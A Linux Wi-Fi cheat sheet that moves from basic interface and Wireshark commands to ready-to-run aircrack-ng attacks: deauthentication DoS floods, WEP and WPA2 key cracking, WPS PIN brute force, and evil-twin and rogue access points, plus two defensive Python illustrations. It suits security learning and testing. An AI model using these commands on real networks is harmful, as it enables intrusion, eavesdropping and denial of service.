Displays all TCP connections (-t option) without resolving host names (-n option):
netstat -nt
Displays all ports the computer is listening on (TCP only, no host name resolution):
netstat -ntl
Turns on packet forwarding between networks (enables router functionality); the value 1 must be given, otherwise sysctl only reads the current setting:
sysctl -w net.ipv4.ip_forward=1
Scans for Wi-Fi networks visible to the wlan0 interface:
iw dev wlan0 scan
Displays information about the Wi-Fi network the wlan0 interface is connected to:
iw dev wlan0 link
Connects to the specified unprotected Wi-Fi network:
iw dev wlan0 connect network_name
Displays the list of wireless network interfaces:
iwconfig
Activates the wlan0 network interface:
ifconfig wlan0 up
Displays the status of the wlan0 network interface:
ifconfig wlan0
Displays detailed information about the access points found:
iwlist wlan0 scanning
Connects to an unprotected Wi-Fi network:
iwconfig wlan0 essid "my network"
Connects to a WEP-protected Wi-Fi network (the key argument is a placeholder for the network's WEP key):
iwconfig wlan0 essid "my network" key haslo_WEP_do_sieci
To connect to a WPA-protected Wi-Fi network you have to use wpa_supplicant with a configuration file (wpa_network.conf below). proto=WPA with TKIP describes the original WPA; for a WPA2 network use proto=RSN with pairwise=CCMP and group=CCMP:
network={
    ssid="my network"
    key_mgmt=WPA-PSK
    proto=WPA
    pairwise=TKIP
    group=TKIP
    psk="password_to_WPA_protected_wifi"
}
wpa_supplicant -D wext -i wlan0 -c wpa_network.conf
-D wext selects the legacy wireless-extensions driver; on current kernels -D nl80211 is the usual choice.
After connecting to a Wi-Fi network use the command below to obtain an IP address via DHCP (the client binary is dhclient; old Debian releases shipped it as dhclient3):
dhclient wlan0
Displays the routing table without resolving host names:
route -n
Lists all Wi-Fi adapters that can work in monitor mode:
airmon-ng
Switches the chosen Wi-Fi adapter to monitor mode:
airmon-ng start wlan0
If the program reports that switching was impossible because of some running processes (they are listed together with their PIDs), execute the command:
airmon-ng check kill
It will kill them. Then try once again to switch the Wi-Fi adapter to monitor mode. This time the attempt should succeed; you can confirm it with the command
airmon-ng
which will show the new monitor interface that was created:
wlan0mon
Switches off monitor mode on the interface:
airmon-ng stop wlan0mon
To be able to capture packets in Wireshark you should run it as root. Then open the menu
Capture -> Interfaces...
and in the dialog box select the interface you want to monitor and click the Start button.
To make Wireshark show only management frames, fill the Filter entry with the condition below:
wlan.fc.type == 0
and press the Apply button.
To make Wireshark show only control frames, fill the Filter entry with the condition below:
wlan.fc.type == 1
To make Wireshark show only data frames, fill the Filter entry with the condition below:
wlan.fc.type == 2
To display only frames of a specified type and subtype - for example management frames of the Beacon subtype - enter the condition:
(wlan.fc.type == 0) && (wlan.fc.subtype == 8)
Probe Request frames:
(wlan.fc.type == 0) && (wlan.fc.subtype == 4)
Probe Response frames:
(wlan.fc.type == 0) && (wlan.fc.subtype == 5)
Deauthentication frames:
(wlan.fc.type == 0) && (wlan.fc.subtype == 0x0c)
Reassociation Request frames:
(wlan.fc.type == 0) && (wlan.fc.subtype == 2)
Reassociation Response frames:
(wlan.fc.type == 0) && (wlan.fc.subtype == 3)
If you want to reveal hidden Wi-Fi networks, monitor Probe Request/Probe Response frames. They are sent just before a connection is made and they contain the hidden SSID in plain text.
Displays frames sent/received by the interface with the specified MAC address:
wlan.addr == cc:cc:cc:cc:cc:cc
Displays all frames except Beacons sent/received by the interface with the specified MAC address:
(wlan.addr == 00:14:bf:8f:b1:f5) && !(wlan.fc.type_subtype == 0x08)
To build a filter from a field selected in the frame details pane of Wireshark, right-click the chosen field and from the context menu select Apply as Filter -> Selected. This fills the Filter entry with the proper condition.
Displays information (e.g. signal strength, channel, encryption) about the access point with the specified MAC address:
airodump-ng --bssid 70:62:b8:65:c8:58 wlan0mon
As above, but only channel 2 is monitored and only the Wi-Fi clients connected to the specified access point are listed:
airodump-ng -c 2 -a --bssid 70:62:b8:65:c8:58 wlan0mon
Writes the communication between the specified access point and its Wi-Fi clients to files whose names begin with "keystream" or "WEPCrack":
airodump-ng wlan0mon -c 2 --bssid 70:62:b8:65:c8:58 -w keystream
or
airodump-ng wlan0mon --bssid 00:14:BF:B1:52:DE --channel 11 --write WEPCrack
Makes the Wi-Fi interface work on the specified channel (10):
iwconfig wlan0mon channel 10
Wireshark filter that displays only packets sent/received by the specified access point:
wlan.bssid == 70:62:b8:65:c8:58
Wireshark filter that displays only data packets sent/received by the specified access point:
(wlan.bssid == 70:62:b8:65:c8:58) && (wlan.fc.type_subtype == 0x20)
Wireshark filter that displays all packets sent/received by the specified access point except the broadcast (Beacon) ones:
(wlan.bssid == 70:62:b8:65:c8:58) && !(wlan.fc.type_subtype == 0x08)
Runs the injection test (-9 option) against the specified access point (given by ESSID and MAC address):
aireplay-ng -9 -e Linksys -a 70:62:b8:65:c8:58 wlan0mon
Sends Deauthentication packets in the name of the specified access point (with the given MAC address), which makes Wi-Fi clients disconnect and reconnect:
aireplay-ng -0 5 -a 70:62:b8:65:c8:58 wlan0mon
aireplay-ng -0 5 -a 70:62:b8:65:c8:58 --ignore-negative-one wlan0mon
As above, but the Deauthentication packets are sent to the specified (-c option) wireless client. This is a demo of a DoS attack:
aireplay-ng -0 35 -a 00:14:BF:B1:52:DE -c 00:14:BF:8F:B1:F5 wlan1mon
Sends Deauthentication packets in the name of the specified access point (MAC address after the -a option) until CONTROL+C is pressed. This is a DoS attack against all Wi-Fi clients that try to connect to the access point:
aireplay-ng -0 0 -a 00:14:BF:B1:52:DE --ignore-negative-one wlan1mon
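The Wireshark filters earlier on this page (wlan.fc.type, wlan.fc.subtype, wlan.fc.type_subtype) and the deauthentication flood just shown both come down to the two-byte Frame Control field of the 802.11 header. The Python below is an added illustration, not part of this cheat sheet or of the aircrack-ng suite: it decodes that field the way the filters see it and counts deauthentication frames per BSSID, which is the signature a wireless IDS uses to flag such a flood. The frames are constructed sample data built from the MAC addresses used on this page.

```python
import struct
from collections import Counter

# Wireshark wlan.fc.type_subtype values that appear in the filters on this page.
TYPE_SUBTYPE_NAMES = {0x02: "Reassociation Request", 0x03: "Reassociation Response",
                      0x04: "Probe Request", 0x05: "Probe Response", 0x08: "Beacon",
                      0x0c: "Deauthentication", 0x20: "Data"}

def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def _hexmac(m: str) -> bytes:
    return bytes.fromhex(m.replace(":", ""))

def parse_header(frame: bytes) -> dict:
    """Decode the Frame Control field and addresses of an 802.11 MAC header (no FCS)."""
    fc = struct.unpack_from("<H", frame, 0)[0]          # little-endian on the air
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF   # wlan.fc.type / wlan.fc.subtype
    ts = (ftype << 4) | subtype                         # wlan.fc.type_subtype
    return {"type": ftype, "subtype": subtype, "type_subtype": ts,
            "name": TYPE_SUBTYPE_NAMES.get(ts, f"0x{ts:02x}"),
            "addr1": _mac(frame[4:10]),                                 # receiver
            "addr2": _mac(frame[10:16]) if len(frame) >= 16 else None,  # transmitter (wlan.sa)
            "addr3": _mac(frame[16:22]) if len(frame) >= 22 else None}  # BSSID in mgmt frames

def build_frame(type_subtype: int, addr1: str, addr2: str, addr3: str) -> bytes:
    """Construct a minimal header for the sample capture below (constructed test data)."""
    fc = ((type_subtype >> 4) << 2) | ((type_subtype & 0xF) << 4)
    return struct.pack("<H", fc) + b"\x00\x00" + _hexmac(addr1) + _hexmac(addr2) + _hexmac(addr3)

def matches(frame: bytes, ftype: int, subtype: int) -> bool:
    """Equivalent of the filter (wlan.fc.type == ftype) && (wlan.fc.subtype == subtype)."""
    h = parse_header(frame)
    return h["type"] == ftype and h["subtype"] == subtype

def deauth_flood_sources(frames, threshold: int) -> list:
    """BSSIDs that sent at least `threshold` deauthentication frames in the capture."""
    counts = Counter()
    for f in frames:
        h = parse_header(f)
        if h["type_subtype"] == 0x0c:
            counts[h["addr3"]] += 1
    return sorted(b for b, n in counts.items() if n >= threshold)

# Constructed sample capture using the MAC addresses from this page.
AP, CLIENT, BCAST = "00:14:bf:b1:52:de", "00:14:bf:8f:b1:f5", "ff:ff:ff:ff:ff:ff"
SAMPLE = ([build_frame(0x08, BCAST, AP, AP)] * 2          # two Beacons from the AP
          + [build_frame(0x04, BCAST, CLIENT, BCAST)]     # one Probe Request from the client
          + [build_frame(0x0c, BCAST, AP, AP)] * 5        # five broadcast deauths "from" the AP
          + [build_frame(0x20, AP, CLIENT, AP)])          # one data frame client -> AP
```

In a real capture the same counting is done per time window; a burst of broadcast deauthentications carrying a BSSID that also keeps sending normal Beacons is the pattern to alert on.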
Uses the WEP keystream captured in the keystream...xor file to authenticate (-1 option) with the specified (after the -a option) access point. The command uses the MAC address given after the -h option as the client's MAC address:
aireplay-ng -1 0 -e Linksys -y keystream-70:62:b8:65:c8:58.xor -a 70:62:b8:65:c8:58 -h cc:cc:cc:cc:cc:cc wlan0mon
Injects ARP packets (-3 option) in the name of the specified Wi-Fi client (-h option) into the wireless network with the specified access point (-b option):
aireplay-ng -3 -b 00:14:BF:B1:52:DE -h 00:14:BF:8F:B1:F5 wlan0mon
Cracks the WEP key:
aircrack-ng WEPCrack-01.cap
Changes the default regulatory domain setting of the Wi-Fi card to the specified country (Poland, the United States):
iw reg set PL
iw reg set US
Sets the specified MAC address on the wlan0 interface:
macchanger -m <mac> wlan0
In Wireshark, the packets - from a *.cap file or captured live - that carry the authentication have the value EAPOL in the Protocol column and a string like "Key (Message 1 of 4)" in the Info column.
Dictionary cracking of a WPA2 password:
aircrack-ng linksys-01.cap -w file_with_passwords.txt
Speeds up dictionary cracking by precomputing PMK keys for a given SSID (and only for it):
genpmk -f dictionary_file.txt -d computed_PMK_keys.txt -s Linksys
Uses the computed PMK keys to guess the password:
cowpatty -d computed_PMK_keys.txt -s Linksys -r linksys-01.cap
To use the file of PMK keys generated by genpmk in aircrack-ng, you have to convert it to the appropriate format:
airolib-ng PMK_for_aircrack.txt --import cowpatty computed_PMK_keys.txt
Then use the command:
aircrack-ng -r PMK_for_aircrack.txt linksys-01.cap
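Why the genpmk table above is tied to one SSID: WPA/WPA2-PSK derives the PMK with PBKDF2-HMAC-SHA1 using the SSID as the salt, so a table computed for "Linksys" says nothing about any other network name, which is the defender's reason not to keep a default SSID. The Python below is an added illustration, not part of this cheat sheet or of genpmk; it checks the derivation against the IEEE 802.11i Annex H test vector and builds a tiny per-SSID table from a constructed candidate list.

```python
import hashlib

# IEEE 802.11i-2004 Annex H.4.1 test vector for the passphrase-to-PSK mapping.
IEEE_VECTOR = ("password", "IEEE",
               "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why a precomputed table is valid for one network name only."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("802.11 passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def build_pmk_table(candidates, ssid: str) -> dict:
    """What genpmk -s <ssid> produces: a PMK -> passphrase map for a single SSID."""
    return {derive_pmk(p, ssid): p for p in candidates}

def lookup(table: dict, pmk: bytes):
    """A PMK resolves to its passphrase only in the table built for the same SSID."""
    return table.get(pmk)

def vector_ok() -> bool:
    """Self-check against the published IEEE test vector."""
    pw, ssid, expected = IEEE_VECTOR
    return derive_pmk(pw, ssid).hex() == expected

# Constructed candidate list (not a real dictionary file).
CANDIDATES = ["letmein123", "password", "qwerty12345"]
TABLE_LINKSYS = build_pmk_table(CANDIDATES, "Linksys")
```

The same passphrase on a network with a unique SSID yields a PMK absent from the "Linksys" table, so the precomputation buys nothing there.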
Decrypts captured WEP packets:
airdecap-ng -w found_wep_key WEPCrack-01.cap
Decrypts captured WPA/WPA2 PSK packets:
airdecap-ng -p password_found WPACrack-01.cap -e Linksys
Creates an evil twin access point - an AP that imitates an already existing AP (linksys_devel) working on channel 11. The AP created this way has an ESSID equal to "default", periodically switching to "linksys_devel". The nearest Wi-Fi clients will connect to the AP:
airbase-ng --essid linksys_devel -c 11 wlan1mon
As above, but it creates an evil twin that is harder to detect - one that also has a MAC address identical to the original AP's. However, from my tests it turns out that it is harder to make Wi-Fi clients connect to this AP:
airbase-ng -a 00:14:BF:B1:52:DE --essid linksys_devel -c 11 wlan1mon
Creates an access point without encryption:
airbase-ng --essid linksys_devel -a 11:11:11:11:11:11 -c 11 wlan1mon
Creates a WEP-protected access point:
airbase-ng --essid linksys_devel -a 22:22:22:22:22:22 -c 11 -W 1 wlan1mon
Creates a WPA-PSK-protected access point:
airbase-ng --essid linksys_devel -a 33:33:33:33:33:33 -c 11 -W 1 -z 2 wlan1mon
Creates a WPA2-PSK-protected access point:
airbase-ng --essid linksys_devel -a 44:44:44:44:44:44 -c 11 -W 1 -Z 2 wlan1mon
Detects access points that run the WPS protocol:
wash --ignore-fcs -i wlan0mon
Cracks the WPS PIN by brute force:
reaver -i wlan0mon -b 11:22:33:44:55:66 -vv
Monitors Probe Request packets in the terminal:
tshark -n -i wlan0mon subtype probereq
Monitors Probe Request packets in the terminal; the output contains only the client's MAC address and the SSID of the access point (field output options are given with -E, not -e; older Wireshark versions named the SSID field wlan_mgt.ssid instead of wlan.ssid):
tshark -n -i wlan0mon subtype probereq -T fields -E separator=, -e wlan.sa -e wlan.ssid
How to configure a rogue (unauthorized) access point bridged to the wired network:
airmon-ng start wlan0
airbase-ng --essid Test -c 11 wlan0mon
apt-get install bridge-utils
brctl addbr my-bridge
brctl addif my-bridge at0
brctl addif my-bridge eth1
ifconfig at0 0.0.0.0 up
ifconfig eth1 0.0.0.0 up
ifconfig my-bridge 192.168.0.180 up
echo 1 > /proc/sys/net/ipv4/ip_forward
ip route del default
ip route add default via 192.168.0.1
The process of cracking a WEP key:
airodump-ng wlan0mon --bssid 00:14:BF:B1:52:DE --channel 11 --write WEPCrack
aireplay-ng -3 -b 00:14:BF:B1:52:DE -h 00:14:BF:8F:B1:F5 wlan0mon
aircrack-ng WEPCrack-01.cap